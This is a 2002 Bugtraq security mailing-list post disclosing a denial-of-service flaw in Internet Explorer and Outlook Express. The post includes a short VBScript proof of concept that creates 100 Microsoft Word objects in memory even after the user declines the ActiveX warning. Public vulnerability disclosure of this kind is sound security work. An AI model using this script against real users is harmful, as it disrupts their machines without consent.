[25012] in bugtraq
IE Word ActiveX DoS Loop
daemon@ATHENA.MIT.EDU (eflorio@edmaster.it)
Tue Apr 9 16:14:35 2002
Date: 8 Apr 2002 19:40:17 -0000
Message-ID: <20020408194017.18016.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: <eflorio@edmaster.it>
To: bugtraq@securityfocus.com
There is a flaw in ActiveX object creation
used in VBscript for Word object; this can
be used as Denial of Service.
Try to use this code (remove "_" before using it) :
;<_SCRIPT LANGUAGE="VbScript">
;On Error Resume Next
;Dim a
;Dim i
;for i=1 to 100
;Set a = CreateObject("Word.Application")
;Next
;<_/SCRIPT>
This script will activate the security warning about
creation of an ActiveX object, but when someone
click on "NO" and deny execution
of the script, the script is stopped, but
the creation Word object in memory still
continues. This sample script creates 100 Word
object in memory.....it's a real DoS!
(try CTRL+ALT+CANC to see them)
Works for IE/Outlook Express and Word2000/XP
objects. Other office components (excel, powerpoint,
access, etc.) maybe not affected.
Elia Florio
